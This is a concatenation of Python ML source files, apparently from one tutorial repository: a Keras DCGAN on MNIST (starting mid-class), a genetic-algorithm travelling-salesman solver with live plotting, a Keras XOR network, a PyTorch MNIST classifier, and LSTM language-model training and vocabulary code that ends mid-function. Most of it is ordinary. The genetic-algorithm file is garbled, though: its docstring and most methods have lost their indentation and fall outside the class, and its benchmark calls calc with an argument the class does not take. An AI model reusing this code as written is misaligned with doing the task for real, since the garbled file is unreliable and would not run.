        self.D.add(LeakyReLU(0.2))
        self.D.add(Dropout(dropout))
        self.D.add(Conv2D(depth*8, 5, strides=1, padding="same"))
        self.D.add(LeakyReLU(0.2))
        self.D.add(Dropout(dropout))
        # convert to 1 dimension
        self.D.add(Flatten())
        self.D.add(Dense(1, activation="sigmoid"))
        print("="*50, "Discriminator", "="*50)
        self.D.summary()
        return self.D
    def generator(self):
        """Build (once) and return the generator: a 100-d noise vector is
        projected to 7x7x256, then upsampled/transposed-convolved up to a
        28x28x1 image with sigmoid pixel values."""
        if self.G:
            return self.G
        self.G = Sequential()
        dropout = 0.4
        # converting from the 100-d noise vector to dim x dim x depth
        # (100,) to (7, 7, 256)
        depth = 64 * 4
        dim = 7
        self.G.add(Dense(dim*dim*depth, input_dim=100))
        self.G.add(BatchNormalization(momentum=0.9))
        self.G.add(Activation("relu"))
        self.G.add(Reshape((dim, dim, depth)))
        self.G.add(Dropout(dropout))
        # upsampling to (14, 14, 128)
        self.G.add(UpSampling2D())
        self.G.add(Conv2DTranspose(depth // 2, 5, padding="same"))
        self.G.add(BatchNormalization(momentum=0.9))
        self.G.add(Activation("relu"))
        self.G.add(Dropout(dropout))
        # up to (28, 28, 64)
        self.G.add(UpSampling2D())
        self.G.add(Conv2DTranspose(depth // 4, 5, padding="same"))
        self.G.add(BatchNormalization(momentum=0.9))
        self.G.add(Activation("relu"))
        self.G.add(Dropout(dropout))
        # to (28, 28, 32)
        self.G.add(Conv2DTranspose(depth // 8, 5, padding="same"))
        self.G.add(BatchNormalization(momentum=0.9))
        self.G.add(Activation("relu"))
        self.G.add(Dropout(dropout))
        # to (28, 28, 1) (img)
        self.G.add(Conv2DTranspose(1, 5, padding="same"))
        self.G.add(Activation("sigmoid"))
        print("="*50, "Generator", "="*50)
        self.G.summary()
        return self.G
    def discriminator_model(self):
        """Build (once) the compiled discriminator training model."""
        if self.DM:
            return self.DM
        # optimizer = RMSprop(lr=0.001, decay=6e-8)
        optimizer = Adam(0.0002, 0.5)
        self.DM = Sequential()
        self.DM.add(self.discriminator())
        self.DM.compile(loss="binary_crossentropy", optimizer=optimizer, metrics=["accuracy"])
        return self.DM
    def adversarial_model(self):
        """Build (once) the compiled adversarial model: generator stacked
        with the (shared) discriminator, used to train the generator."""
        if self.AM:
            return self.AM
        # optimizer = RMSprop(lr=0.001, decay=3e-8)
        optimizer = Adam(0.0002, 0.5)
        self.AM = Sequential()
        self.AM.add(self.generator())
        self.AM.add(self.discriminator())
        self.AM.compile(loss="binary_crossentropy", optimizer=optimizer, metrics=["accuracy"])
        return self.AM
class MNIST:
    """Trains the DCGAN on the MNIST digits dataset.

    Handles loading the data, (re)creating the models — resuming from any
    discriminator_*/generator_*/adversarial_*.h5 snapshots found on disk —
    the alternating train loop, and saving sample image grids.
    """
    def __init__(self):
        # MNIST image dimensions
        self.img_x = 28
        self.img_y = 28
        self.img_z = 1
        # number of steps already trained (restored from snapshot file names)
        self.steps = 0
        self.load_data()
        self.create_models()
        # used image indices
        self._used_indices = set()
    def load_data(self):
        """Load MNIST and add the trailing channel axis -> (n, 28, 28, 1)."""
        (self.X_train, self.y_train), (self.X_test, self.y_test) = mnist.load_data()
        # reshape to (num_samples, 28, 28 , 1)
        self.X_train = np.expand_dims(self.X_train, axis=-1)
        self.X_test = np.expand_dims(self.X_test, axis=-1)
    def create_models(self):
        """Build the GAN models and resume from the latest saved weights,
        if any snapshot files exist in the working directory."""
        self.GAN = GAN()
        self.discriminator = self.GAN.discriminator_model()
        self.adversarial = self.GAN.adversarial_model()
        self.generator = self.GAN.generator()
        discriminators = glob.glob("discriminator_*.h5")
        generators = glob.glob("generator_*.h5")
        adversarial = glob.glob("adversarial_*.h5")
        if len(discriminators) != 0:
            print("[+] Found a discriminator ! Loading weights ...")
            self.discriminator.load_weights(discriminators[0])
        if len(generators) != 0:
            print("[+] Found a generator ! Loading weights ...")
            self.generator.load_weights(generators[0])
        if len(adversarial) != 0:
            print("[+] Found an adversarial model ! Loading weights ...")
            # the step count is encoded in the snapshot file name
            self.steps = int(adversarial[0].replace("adversarial_", "").replace(".h5", ""))
            self.adversarial.load_weights(adversarial[0])
    def get_unique_random(self, batch_size=256):
        """Return batch_size random indices into X_train (the uniqueness
        bookkeeping below is currently disabled)."""
        indices = np.random.randint(0, self.X_train.shape[0], size=batch_size)
        # in_used_indices = np.any([i in indices for i in self._used_indices])
        # while in_used_indices:
            # indices = np.random.randint(0, self.X_train.shape[0], size=batch_size)
            # in_used_indices = np.any([i in indices for i in self._used_indices])
        # self._used_indices |= set(indices)
        # if len(self._used_indices) > self.X_train.shape[0] // 2:
            # if used indices is more than half of training samples, clear it
            # that is to enforce it to train at least more than half of the dataset uniquely
            # self._used_indices.clear()
        return indices
    def train(self, train_steps=2000, batch_size=256, save_interval=0):
        """Alternate discriminator and adversarial updates for train_steps
        steps (resuming at self.steps); optionally save sample grids and
        model snapshots every save_interval steps."""
        noise_input = None
        steps = tqdm.tqdm(list(range(self.steps, train_steps)))
        # label tensors: 0 = fake, 1 = real
        fake = np.zeros((batch_size, 1))
        real = np.ones((batch_size, 1))
        for i in steps:
            real_images = self.X_train[self.get_unique_random(batch_size)]
            # noise = np.random.uniform(-1.0, 1.0, size=(batch_size, 100))
            noise = np.random.normal(size=(batch_size, 100))
            fake_images = self.generator.predict(noise)
            # get 256 real images and 256 fake images
            # train the discriminator on real and fake batches separately
            d_loss_real = self.discriminator.train_on_batch(real_images, real)
            d_loss_fake = self.discriminator.train_on_batch(fake_images, fake)
            d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
            # X = np.concatenate((real_images, fake_images))
            # y = np.zeros((2*batch_size, 1))
            # 0 for fake and 1 for real
            # y[:batch_size, :] = 1
            # shuffle
            # shuffle_in_unison(X, y)
            # d_loss = self.discriminator.train_on_batch(X, y)
            # y = np.ones((batch_size, 1))
            # noise = np.random.uniform(-1.0, 1.0, size=(batch_size, 100))
            # fool the adversarial, telling him everything is real
            a_loss = self.adversarial.train_on_batch(noise, real)
            log_msg = f"[D loss: {d_loss[0]:.6f}, D acc: {d_loss[1]:.6f} | A loss: {a_loss[0]:.6f}, A acc: {a_loss[1]:.6f}]"
            steps.set_description(log_msg)
            if save_interval > 0:
                # fixed noise so saved sample grids are comparable over time
                noise_input = np.random.uniform(low=-1, high=1.0, size=(16, 100))
                if (i + 1) % save_interval == 0:
                    self.plot_images(save2file=True, samples=noise_input.shape[0], noise=noise_input, step=(i+1))
                    self.discriminator.save(f"discriminator_{i+1}.h5")
                    self.generator.save(f"generator_{i+1}.h5")
                    self.adversarial.save(f"adversarial_{i+1}.h5")
    def plot_images(self, save2file=False, fake=True, samples=16, noise=None, step=0):
        """Plot (or save) a 4x4 grid of generated (fake=True) or real
        MNIST images; *step* is embedded in the file name when noise is
        supplied externally."""
        filename = "mnist_fake.png"
        if fake:
            if noise is None:
                noise = np.random.uniform(-1.0, 1.0, size=(samples, 100))
            else:
                filename = f"mnist_{step}.png"
            images = self.generator.predict(noise)
        else:
            i = np.random.randint(0, self.X_train.shape[0], samples)
            images = self.X_train[i]
            if noise is None:
                filename = "mnist_real.png"
        plt.figure(figsize=(10, 10))
        for i in range(images.shape[0]):
            plt.subplot(4, 4, i+1)
            image = images[i]
            image = np.reshape(image, (self.img_x, self.img_y))
            plt.imshow(image, cmap="gray")
            plt.axis("off")
        plt.tight_layout()
        if save2file:
            plt.savefig(filename)
            plt.close("all")
        else:
            plt.show()
# https://stackoverflow.com/questions/4601373/better-way-to-shuffle-two-numpy-arrays-in-unison
def shuffle_in_unison(a, b):
    """Shuffle arrays *a* and *b* in place with the same permutation."""
    saved_state = np.random.get_state()
    np.random.shuffle(a)
    # rewind the RNG so b receives the identical permutation
    np.random.set_state(saved_state)
    np.random.shuffle(b)
# train the DCGAN on MNIST (checkpointing every 500 steps), then save sample
# grids of generated and of real digits for comparison
if __name__ == "__main__":
    mnist_gan = MNIST()
    mnist_gan.train(train_steps=10000, batch_size=256, save_interval=500)
    mnist_gan.plot_images(fake=True, save2file=True)
    mnist_gan.plot_images(fake=False, save2file=True)
import random
import numpy as np
import pandas as pd
import operator
import matplotlib.pyplot as plt
from threading import Event, Thread
class Individual:
    """Mutable wrapper around a candidate solution (e.g. a route).

    Used to share the current best individual with the animation thread,
    which reads ``object`` while the GA replaces it via update().
    """
    def __init__(self, object):
        self.object = object
    def update(self, new):
        """Replace the wrapped candidate."""
        self.object = new
    def __repr__(self):
        # BUGFIX: __repr__/__str__ must return a str; returning the wrapped
        # object directly raised TypeError whenever it was not a string
        # (candidates are typically lists).
        return str(self.object)
    def __str__(self):
        return str(self.object)
class GeneticAlgorithm:
"""General purpose genetic algorithm implementation"""
    def __init__(self, individual, popsize, elite_size, mutation_rate, generations, fitness_func, plot=True, prn=True, animation_func=None):
        """
        :param individual: base individual (e.g. a list of cities); the
            population consists of random permutations of it
        :param popsize: number of individuals per generation
        :param elite_size: number of top individuals kept during selection
        :param mutation_rate: per-gene mutation probability
        :param generations: number of generations to run
        :param fitness_func: callable mapping an individual to a fitness score
        :param plot: whether to plot progress (overridden in calc() when an
            animation function is / is not provided)
        :param prn: print progress to stdout
        :param animation_func: optional callable used to animate progress
        :raises TypeError: if fitness_func is not callable
        """
        self.individual = individual
        self.popsize = popsize
        self.elite_size = elite_size
        self.mutation_rate = mutation_rate
        self.generations = generations
        # fail fast on a non-callable fitness function
        if not callable(fitness_func):
            raise TypeError("fitness_func must be a callable object.")
        self.get_fitness = fitness_func
        self.plot = plot
        self.prn = prn
        self.population = self._init_pop()
        self.animate = animation_func
def calc(self):
"""Try to find the best individual.
This function returns (initial_individual, final_individual, """
sorted_pop = self.sortpop()
initial_route = self.population[sorted_pop[0][0]]
distance = 1 / sorted_pop[0][1]
progress = [ distance ]
if callable(self.animate):
self.plot = True
individual = Individual(initial_route)
stop_animation = Event()
self.animate(individual, progress, stop_animation, plot_conclusion=initial_route)
else:
self.plot = False
if self.prn:
print(f"Initial distance: {distance}")
try:
if self.plot:
for i in range(self.generations):
population = self.next_gen()
sorted_pop = self.sortpop()
distance = 1 / sorted_pop[0][1]
progress.append(distance)
if self.prn:
print(f"[Generation:{i}] Current distance: {distance}")
route = population[sorted_pop[0][0]]
individual.update(route)
else:
for i in range(self.generations):
population = self.next_gen()
distance = 1 / self.sortpop()[0][1]
if self.prn:
print(f"[Generation:{i}] Current distance: {distance}")
except KeyboardInterrupt:
pass
try:
stop_animation.set()
except NameError:
pass
final_route_index = self.sortpop()[0][0]
final_route = population[final_route_index]
if self.prn:
print("Final route:", final_route)
return initial_route, final_route, distance
def create_population(self):
return random.sample(self.individual, len(self.individual))
def _init_pop(self):
return [ self.create_population() for i in range(self.popsize) ]
def sortpop(self):
"""This function calculates the fitness of each individual in population
And returns a population sorted by its fitness in descending order"""
result = [ (i, self.get_fitness(individual)) for i, individual in enumerate(self.population) ]
return sorted(result, key=operator.itemgetter(1), reverse=True)
def selection(self):
sorted_pop = self.sortpop()
df = pd.DataFrame(np.array(sorted_pop), columns=["Index", "Fitness"])
df['cum_sum'] = df['Fitness'].cumsum()
df['cum_perc'] = 100 * df['cum_sum'] / df['Fitness'].sum()
result = [ sorted_pop[i][0] for i in range(self.elite_size) ]
for i in range(len(sorted_pop) - self.elite_size):
pick = random.random() * 100
for i in range(len(sorted_pop)):
if pick <= df['cum_perc'][i]:
result.append(sorted_pop[i][0])
break
return [ self.population[index] for index in result ]
def breed(self, parent1, parent2):
child1, child2 = [], []
gene_A = random.randint(0, len(parent1))
gene_B = random.randint(0, len(parent2))
start_gene = min(gene_A, gene_B)
end_gene = max(gene_A, gene_B)
for i in range(start_gene, end_gene):
child1.append(parent1[i])
child2 = [ item for item in parent2 if item not in child1 ]
return child1 + child2
def breed_population(self, selection):
pool = random.sample(selection, len(selection))
children = [selection[i] for i in range(self.elite_size)]
children.extend([self.breed(pool[i], pool[len(selection)-i-1]) for i in range(len(selection) - self.elite_size)])
return children
def mutate(self, individual):
individual_length = len(individual)
for swapped in range(individual_length):
if(random.random() < self.mutation_rate):
swap_with = random.randint(0, individual_length-1)
individual[swapped], individual[swap_with] = individual[swap_with], individual[swapped]
return individual
def mutate_population(self, children):
return [ self.mutate(individual) for individual in children ]
def next_gen(self):
selection = self.selection()
children = self.breed_population(selection)
self.population = self.mutate_population(children)
return self.population
from genetic import plt
from genetic import Individual
from threading import Thread
def plot_routes(initial_route, final_route):
    """Draw the initial and final routes side by side on one figure."""
    _, axes = plt.subplots(nrows=1, ncols=2)
    panels = [("Initial Route", initial_route), ("Final Route", final_route)]
    for axis, (title, cities) in zip(axes, panels):
        axis.title.set_text(title)
        for idx, city in enumerate(cities):
            if idx == 0:
                # mark the starting city in green with a label
                axis.text(city.x-5, city.y+5, "Start")
                axis.scatter(city.x, city.y, s=70, c='g')
            else:
                axis.scatter(city.x, city.y, s=70, c='b')
        # connect the cities in order, then close the loop back to the start
        axis.plot([c.x for c in cities], [c.y for c in cities], c='r')
        axis.plot([cities[-1].x, cities[0].x], [cities[-1].y, cities[0].y], c='r')
    plt.show()
def animate_progress(route, progress, stop_animation, plot_conclusion=None):
    """Start a background thread that live-plots the evolving route and the
    distance-per-generation curve until *stop_animation* is set.

    :param route: Individual wrapper whose .object is updated by the GA loop
    :param progress: shared list of distances, appended to by the GA loop
    :param stop_animation: threading.Event used to stop the redraw loop
    :param plot_conclusion: when given, used as the initial route for a final
        side-by-side plot after the animation stops
    """
    def animate():
        nonlocal route
        _, ax1 = plt.subplots(nrows=1, ncols=2)
        while True:
            if isinstance(route, Individual):
                # unwrap the latest candidate pushed by the GA thread
                target = route.object
            ax1[0].clear()
            ax1[1].clear()
            # current routes and cities
            ax1[0].title.set_text("Current routes")
            for i, city in enumerate(target):
                if i == 0:
                    ax1[0].text(city.x-5, city.y+5, "Start")
                    ax1[0].scatter(city.x, city.y, s=70, c='g')
                else:
                    ax1[0].scatter(city.x, city.y, s=70, c='b')
            ax1[0].plot([ city.x for city in target ], [city.y for city in target], c='r')
            ax1[0].plot([target[-1].x, target[0].x], [target[-1].y, target[0].y], c='r')
            # current distance graph
            ax1[1].title.set_text("Current distance")
            ax1[1].plot(progress)
            ax1[1].set_ylabel("Distance")
            ax1[1].set_xlabel("Generation")
            # pause doubles as the redraw interval
            plt.pause(0.05)
            if stop_animation.is_set():
                break
        plt.show()
        if plot_conclusion:
            initial_route = plot_conclusion
            plot_routes(initial_route, target)
    Thread(target=animate).start()
import matplotlib.pyplot as plt
import random
import numpy as np
import operator
from plots import animate_progress, plot_routes
class City:
    """A 2-D point; subtracting two cities yields their Euclidean distance."""

    def __init__(self, x, y):
        self.x = x
        self.y = y

    def distance(self, city):
        """Return the Euclidean distance between this city and *city*."""
        dx = self.x - city.x
        dy = self.y - city.y
        # squaring makes the sign irrelevant, so no abs() needed
        return np.sqrt(dx ** 2 + dy ** 2)

    def __sub__(self, city):
        return self.distance(city)

    def __repr__(self):
        return f"({self.x}, {self.y})"

    def __str__(self):
        return self.__repr__()
def get_fitness(route):
    """Return 1 / total tour length of *route*, treated as a closed loop."""
    total = 0
    for pos, from_city in enumerate(route):
        # wrap around to the first city after the last one
        to_city = route[(pos + 1) % len(route)]
        total += from_city - to_city
    return 1 / total
def load_cities():
    """Return the fixed benchmark list of 26 City instances."""
    coords = [(169, 20), (103, 24), (41, 9), (177, 76), (138, 173), (163, 108), (93, 34), (200, 84), (19, 184), (117, 176), (153, 30), (140, 29), (38, 108), (89, 183), (18, 4), (174, 38), (109, 169), (93, 23), (156, 10), (171, 27), (164, 91), (109, 194), (90, 169), (115, 37), (177, 93), (169, 20)]
    return [ City(x, y) for x, y in coords ]
def generate_cities(size):
    """Generate *size* random City points pushed toward the border of a 200x200 square."""
    def _border_city():
        x = random.randint(0, 200)
        y = random.randint(0, 200)
        if 40 < x < 160:
            # x is central: force y toward the top or bottom band
            y = random.randint(0, 40) if 0.5 <= random.random() else random.randint(160, 200)
        elif 40 < y < 160:
            # y is central: force x toward the left or right band
            x = random.randint(0, 40) if 0.5 <= random.random() else random.randint(160, 200)
        return City(x, y)
    return [ _border_city() for _ in range(size) ]
def benchmark(cities):
    """Grid-search GA hyper-parameters over *cities* and report how many
    generations each combination needed.

    NOTE(review): this calls ``gen.calc(ret=("generation", 755))`` and expects
    a generation count back, but the ``GeneticAlgorithm.calc`` defined
    elsewhere in this file takes no ``ret`` argument and returns a distance —
    confirm which version of the class this was written against.
    """
    popsizes = [60, 80, 100, 120, 140]
    elite_sizes = [5, 10, 20, 30, 40]
    mutation_rates = [0.02, 0.01, 0.005, 0.003, 0.001]
    generations = 1200
    # total number of grid combinations, for progress reporting
    iterations = len(popsizes) * len(elite_sizes) * len(mutation_rates)
    iteration = 0
    gens = {}
    for popsize in popsizes:
        for elite_size in elite_sizes:
            for mutation_rate in mutation_rates:
                iteration += 1
                gen = GeneticAlgorithm(cities, popsize=popsize, elite_size=elite_size, mutation_rate=mutation_rate, generations=generations, fitness_func=get_fitness, prn=False)
                initial_route, final_route, generation = gen.calc(ret=("generation", 755))
                if generation == generations:
                    print(f"[{iteration}/{iterations}] (popsize={popsize}, elite_size={elite_size}, mutation_rate={mutation_rate}): could not reach the solution")
                else:
                    print(f"[{iteration}/{iterations}] (popsize={popsize}, elite_size={elite_size}, mutation_rate={mutation_rate}): {generation} generations was enough")
                if generation != generations:
                    gens[iteration] = generation
    # reversed_gen = {v:k for k, v in gens.items()}
    # report combinations sorted by how few generations they needed
    output = sorted(gens.items(), key=operator.itemgetter(1))
    for i, gens in output:
        print(f"Iteration: {i} generations: {gens}")
# [1] (popsize=60, elite_size=30, mutation_rate=0.001): 235 generations was enough
# [2] (popsize=80, elite_size=20, mutation_rate=0.001): 206 generations was enough
# [3] (popsize=100, elite_size=30, mutation_rate=0.001): 138 generations was enough
# [4] (popsize=120, elite_size=30, mutation_rate=0.002): 117 generations was enough
# [5] (popsize=140, elite_size=20, mutation_rate=0.003): 134 generations was enough
# The notes:
# 1.1 Increasing the mutation rate too much makes the distance curve erratic and prevents convergence to the optimal distance.
# 1.2 So the mutation rate should be kept as small as 1% or lower.
# 2. Elite size is likely to be about 30% or less of total population
# 3. Generations depends on the other parameters, can be a fixed number, or until we reach the optimal distance.
# 4.
if __name__ == "__main__":
    from genetic import GeneticAlgorithm
    # fixed benchmark city list (see load_cities); swap for random cities below
    cities = load_cities()
    # cities = generate_cities(50)
    # parameters
    popsize = 120
    elite_size = 30
    mutation_rate = 0.1
    generations = 400
    # run the GA with the live-plot animation thread attached
    gen = GeneticAlgorithm(cities, popsize=popsize, elite_size=elite_size, mutation_rate=mutation_rate, generations=generations, fitness_func=get_fitness, animation_func=animate_progress)
    initial_route, final_route, distance = gen.calc()
import tensorflow as tf
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
import re
import numpy as np
import os
import time
import json
from glob import glob
from PIL import Image
import pickle
import numpy as np
from keras.utils import np_utils
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Activation
# fixed seed for reproducible weight initialization
np.random.seed(19)
# XOR truth table: four input pairs and their labels
X = np.array([[0,0],[0,1],[1,0],[1,1]]).astype('float32')
y = np.array([[0],[1],[1],[0]]).astype('float32')
# one-hot encode labels -> shape (4, 2), matching the 2-unit output layer
y = np_utils.to_categorical(y)
xor = Sequential()
# add required layers
xor.add(Dense(8, input_dim=2))
# hyperbolic tangent function to the first hidden layer ( 8 nodes )
xor.add(Activation("tanh"))
xor.add(Dense(8))
xor.add(Activation("relu"))
# output layer
xor.add(Dense(2))
# sigmoid function to the output layer ( final )
xor.add(Activation("sigmoid"))
# Cross-entropy error function
xor.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
# show the summary of the model
xor.summary()
xor.fit(X, y, epochs=400, verbose=1)
# accuracy evaluated on the (tiny) training set itself
score = xor.evaluate(X, y)
print(f"Accuracy: {score[-1]}")
# Checking the predictions
print("\nPredictions:")
print(xor.predict(X))
import torch
import torchvision
from torchvision import transforms, datasets
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import matplotlib.pyplot as plt
# number of full passes over the training data
epochs = 3
# samples per gradient update
batch_size = 64
# building the network now
class Net(nn.Module):
    """Four-layer fully-connected classifier for flattened 28x28 MNIST digits."""

    def __init__(self):
        super().__init__()
        # 28*28 = 784 input pixels -> three hidden layers of 64 -> 10 logits
        self.fc1 = nn.Linear(28*28, 64)
        self.fc2 = nn.Linear(64, 64)
        self.fc3 = nn.Linear(64, 64)
        self.fc4 = nn.Linear(64, 10)

    def forward(self, x):
        hidden = x
        for layer in (self.fc1, self.fc2, self.fc3):
            hidden = F.relu(layer(hidden))
        # log-probabilities over the 10 digit classes
        return F.log_softmax(self.fc4(hidden), dim=1)
if __name__ == "__main__":
    # download (if needed) and load MNIST as tensors
    training_set = datasets.MNIST("", train=True, download=True,
                            transform=transforms.Compose([
                                transforms.ToTensor()
                            ]))
    test_set = datasets.MNIST("", train=False, download=True,
                            transform=transforms.Compose([
                                transforms.ToTensor()
                            ]))
    # load the dataset
    train = torch.utils.data.DataLoader(training_set, batch_size=batch_size, shuffle=True)
    test = torch.utils.data.DataLoader(test_set, batch_size=batch_size, shuffle=False)
    # construct the model
    net = Net()
    # specify the loss and optimizer
    # NOTE(review): this CrossEntropyLoss instance is never used — `loss` is
    # rebound to F.nll_loss(...) inside the training loop below.
    loss = nn.CrossEntropyLoss()
    optimizer = optim.Adam(net.parameters(), lr=0.001)
    # training the model
    for epoch in range(epochs):
        for data in train:
            # data is the batch of data now
            # X are the features, y are labels
            X, y = data
            net.zero_grad()  # set gradients to 0 before loss calculation
            output = net(X.view(-1, 28*28))  # feed flattened images to the network
            loss = F.nll_loss(output, y)  # calculating the negative log likelihood
            loss.backward()  # back propagation
            optimizer.step()  # attempt to optimize weights to account for loss/gradients
        # print the last batch's loss of each epoch
        print(loss)
    correct = 0
    total = 0
    # evaluate accuracy on the test set without tracking gradients
    with torch.no_grad():
        for data in test:
            X, y = data
            output = net(X.view(-1, 28*28))
            for index, i in enumerate(output):
                if torch.argmax(i) == y[index]:
                    correct += 1
                total += 1
    print("Accuracy:", round(correct / total, 3))
    # testing: show the prediction for the first image of the last batch
    print(torch.argmax(net(X.view(-1, 28*28))[0]))
    plt.imshow(X[0].view(28, 28))
    plt.show()
from keras.models import Sequential
from keras.layers import LSTM, Dropout, BatchNormalization, LeakyReLU, Dense, Activation, TimeDistributed
from keras.layers import Bidirectional
def rnn_model(input_dim, cell, num_layers, units, dropout, batch_normalization=True, bidirectional=True):
    """Stack *num_layers* recurrent layers (optionally bidirectional), each
    optionally followed by BatchNormalization + Dropout + LeakyReLU, topped
    with a time-distributed softmax over *input_dim* classes.

    Note: Dropout and LeakyReLU are only added when *batch_normalization*
    is on, mirroring the original layer layout.
    """
    model = Sequential()
    for layer_index in range(num_layers):
        kwargs = {"return_sequences": True}
        if layer_index == 0:
            # only the first layer declares the input shape
            kwargs["input_shape"] = (None, input_dim)
        recurrent = cell(units, **kwargs)
        model.add(Bidirectional(recurrent) if bidirectional else recurrent)
        if batch_normalization:
            model.add(BatchNormalization())
            model.add(Dropout(dropout))
            model.add(LeakyReLU(alpha=0.1))
    model.add(TimeDistributed(Dense(input_dim, activation="softmax")))
    return model
from utils import UNK, text_to_sequence, sequence_to_text
from keras.preprocessing.sequence import pad_sequences
from keras.layers import LSTM
from models import rnn_model
from scipy.ndimage.interpolation import shift
import numpy as np
# to use CPU: hide all GPUs from TensorFlow before it initializes
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
# limit TF to 6 threads and 0 GPUs
# NOTE(review): this config object is built but never passed to a session —
# confirm it is meant to take effect.
config = tf.ConfigProto(intra_op_parallelism_threads=6,
                        inter_op_parallelism_threads=6,
                        allow_soft_placement=True,
                        device_count = {'CPU' : 1,
                                        'GPU' : 0}
                        )
# sequence length the language model was trained with
INPUT_DIM = 50
test_text = ""
test_text += """college or good clerk at university has not pleasant days or used not to have them half a century ago but his position was recognized and the misery was measured can we just make something that is useful for making this happen especially when they are just doing it by"""
# encode the prompt to word ids, shaped (1, 1, num_words) for the RNN
encoded = np.expand_dims(np.array(text_to_sequence(test_text)), axis=0)
encoded = encoded.reshape((-1, encoded.shape[0], encoded.shape[1]))
model = rnn_model(INPUT_DIM, LSTM, 4, 380, 0.3, bidirectional=False)
model.load_weights("results/lm_rnn_v2_6400548.3.h5")
# for i in range(10):
#     predicted_word_int = model.predict_classes(encoded)[0]
#     print(predicted_word_int, end=',')
#     word = sequence_to_text(predicted_word_int)
#     encoded = shift(encoded, -1, cval=predicted_word_int)
#     print(word, end=' ')
# dump raw predictions in each available form for inspection
print("Fed:")
print(encoded)
print("Result: predict")
print(model.predict(encoded)[0])
print("Result: predict_proba")
print(model.predict_proba(encoded)[0])
print("Result: predict_classes")
print(model.predict_classes(encoded)[0])
print(sequence_to_text(model.predict_classes(encoded)[0]))
print()
from models import rnn_model
from utils import sequence_to_text, text_to_sequence, get_batches, get_data, get_text, vocab
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
import numpy as np
import os
# sequence length fed to the RNN per sample
INPUT_DIM = 50
# OUTPUT_DIM = len(vocab)
BATCH_SIZE = 128
# get data
text = get_text("data")
encoded = np.array(text_to_sequence(text))
print(len(encoded))
# X, y = get_data(encoded, INPUT_DIM, 1)
# del text, encoded
model = rnn_model(INPUT_DIM, LSTM, 4, 380, 0.3, bidirectional=False)
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
model.summary()
if not os.path.isdir("results"):
    os.mkdir("results")
# checkpoint file name embeds the training loss
checkpointer = ModelCheckpoint("results/lm_rnn_v2_{loss:.1f}.h5", verbose=1)
# train on ~1% of the corpus per epoch
steps_per_epoch = (len(encoded) // 100) // BATCH_SIZE
model.fit_generator(get_batches(encoded, BATCH_SIZE, INPUT_DIM),
                    epochs=100,
                    callbacks=[checkpointer],
                    verbose=1,
                    steps_per_epoch=steps_per_epoch)
model.save("results/lm_rnn_v2_final.h5")
import numpy as np
import os
import tqdm
import inflect
from string import punctuation, whitespace
from word_forms.word_forms import get_word_forms
# inflect engine converts digits to their spelled-out words
p = inflect.engine()
UNK = "<unk>"
vocab = set()
add = vocab.add
# add unk
add(UNK)
# load the persisted vocabulary, one word per line
with open("data/vocab1.txt") as f:
    for line in f:
        add(line.strip())
# NOTE(review): from here on `vocab` is a sorted *list*, no longer a set
vocab = sorted(vocab)
word2int = {w: i for i, w in enumerate(vocab)}
int2word = {i: w for i, w in enumerate(vocab)}
def update_vocab(word):
    """Register *word* in the vocabulary and both lookup tables.

    Bug fix: by the time this can be called, the module-level ``vocab`` has
    been rebound to a sorted *list* (``vocab = sorted(vocab)`` above), so the
    original ``vocab.add(word)`` raised AttributeError. Add or append
    depending on the actual container type.
    """
    global vocab
    global word2int
    global int2word
    if isinstance(vocab, set):
        vocab.add(word)
    else:
        vocab.append(word)
    # next free integer id is one past the current largest id
    next_int = max(int2word) + 1
    word2int[word] = next_int
    int2word[next_int] = word
def save_vocab(_vocab):
    """Write the vocabulary to ``vocab1.txt``, one word per line, sorted."""
    with open("vocab1.txt", "w") as out:
        out.writelines(f"{word}\n" for word in sorted(_vocab))
def text_to_sequence(text):
    """Map each whitespace-separated word of *text* to its integer id."""
    return list(map(word2int.__getitem__, text.split()))
def sequence_to_text(seq):
    """Map a sequence of integer ids back to a space-joined string."""
    return ' '.join(int2word[token] for token in seq)
def get_batches(arr, batch_size, n_steps):
    """Endlessly yield (x, y) batches of shape (1, batch_size, n_steps) from *arr*.

    y is x shifted left by one position; where no successor element exists
    (the last column of the final window) y is zero-padded.

    Arguments
    ---------
    arr: Array you want to make batches from
    batch_size: Batch size, the number of sequences per batch
    n_steps: Number of sequence steps per batch
    """
    window = batch_size * n_steps
    # drop the tail that doesn't fill a whole batch, then lay out rows
    usable = (len(arr) // window) * window
    grid = arr[:usable].reshape((batch_size, -1))
    while True:
        for start in range(0, grid.shape[1], n_steps):
            x = grid[:, start:start + n_steps]
            shifted = grid[:, start + 1:start + n_steps + 1]
            y = np.zeros(x.shape, dtype=shifted.dtype)
            y[:, :shifted.shape[1]] = shifted
            yield x.reshape(1, *x.shape), y.reshape(1, *y.shape)
def get_data(arr, n_seq, look_forward):
    """Chop *arr* into windows of *n_seq*, targets shifted by *look_forward*.

    Returns (X, Y) of shape (1, n_samples, n_seq). Windows whose target would
    run past the end of *arr* are left zero-filled.
    """
    n_samples = len(arr) // n_seq
    X = np.zeros((n_seq, n_samples))
    Y = np.zeros((n_seq, n_samples))
    for col, start in enumerate(range(0, n_samples * n_seq, n_seq)):
        window = arr[start:start + n_seq]
        target = arr[start + look_forward:start + n_seq + look_forward]
        if len(window) != n_seq or len(target) != n_seq:
            # incomplete final window: stop, leaving remaining columns zeroed
            break
        X[:, col] = window
        Y[:, col] = target
    return X.T.reshape(1, X.shape[1], X.shape[0]), Y.T.reshape(1, Y.shape[1], Y.shape[0])
def get_text(path, files=["carroll-alice.txt", "text.txt", "text8.txt"]):
    """Load, clean and normalize the corpus files under *path*.

    Lowercases, strips punctuation, collapses whitespace, spells out digits,
    replaces out-of-vocabulary words with <unk>, shrinks the module-level
    vocab to the words actually seen, and persists it via save_vocab.

    NOTE(review): mutable default argument *files* — safe only because it is
    never mutated in place.
    """
    global vocab
    global word2int
    global int2word
    text = ""
    file = files[0]
    for file in tqdm.tqdm(files, "Loading data"):
        file = os.path.join(path, file)
        with open(file, encoding="utf8") as f:
            text += f.read().lower()
    punc = set(punctuation)
